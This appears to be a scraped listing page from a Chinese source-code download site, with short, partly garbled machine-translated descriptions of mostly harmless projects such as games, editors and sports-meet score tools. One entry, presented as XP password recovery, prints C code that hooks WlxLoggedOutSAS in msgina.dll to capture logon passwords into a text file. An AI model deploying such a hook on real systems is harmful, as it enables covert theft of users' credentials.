-
运动会成绩输入及管理统计,为中学运动会实际使用开发的
运动会成绩输入及管理统计,为中学运动会实际使用开发的-Games results and management of input statistics, the actual use of the Games for secondary development
- 2022-04-15 21:15:56下载
- 积分:1
-
cuda_sample很热的程序
CUDA_SAMPLE is very hot program
- 2022-02-15 12:06:10下载
- 积分:1
-
Mouse playing small games, as have the number of rats, mice mobile pace. The tot...
打老鼠的小游戏,随着老鼠产生的次数,老鼠的移动速度越来越快。总数为120个,并有评价-Mouse playing small games, as have the number of rats, mice mobile pace. The total number of 120, as well as evaluation of
- 2022-03-18 16:08:16下载
- 积分:1
-
可以生成自己产品序列号的小东东,绝对原创
可以生成自己产品序列号的小东东,绝对原创-their products can generate a sequence of small Dongdong, absolute originality
- 2022-11-13 02:25:02下载
- 积分:1
-
text editor (2), relying on information mechanism is different from MFC and WINA...
文本编辑器(2),自建消息机制,不同于MFC和WINAPI,是上次上传的继续-text editor (2), relying on information mechanism is different from MFC and WINAPI is uploaded to the last
- 2022-08-13 10:56:40下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
lpc10
lpc10-1.5.tar
- 2022-07-17 19:00:38下载
- 积分:1
-
用C++语言实现建立拓扑结构图并输出拓扑有序序列
用C++语言实现建立拓扑结构图并输出拓扑有序序列-With C++ Language to achieve the establishment of topology and output topology map in an orderly sequence
- 2022-10-09 00:30:03下载
- 积分:1
-
Visual C Multimedia Development Guide matching source. See said
Visual C++多媒体开发指南配套源码.看看在说了-Visual C Multimedia Development Guide matching source. See said
- 2022-02-15 16:51:01下载
- 积分:1
-
wonderful the Little Stars (Capture Genius) v1.0. can capture the entire screen,...
非常棒的抓图小精灵(Capture Genius) v1.0,可以捕获整个屏幕、活动窗口、延时捕获窗口、捕获包含标题的窗口、用户窗口、滚动窗口等,捕获的图片并可以保存为BMP、JPGE图片,可以用微软画图工具编辑,可以保存位墙纸.具有打印图片功能.这个小工具还支持多国语言(简体中文、英文)-wonderful the Little Stars (Capture Genius) v1.0. can capture the entire screen, activity window, delay capture window, capturing the title contains the window, the window users, and rolling window. Photo capture and can be saved as BMP, JPGE pictures, you can use Microsoft tools for drawing editor, Wallpaper spaces can be preserved. Photo Print function is. This small device also supports multiple languages (English, English)
- 2023-07-05 13:35:04下载
- 积分:1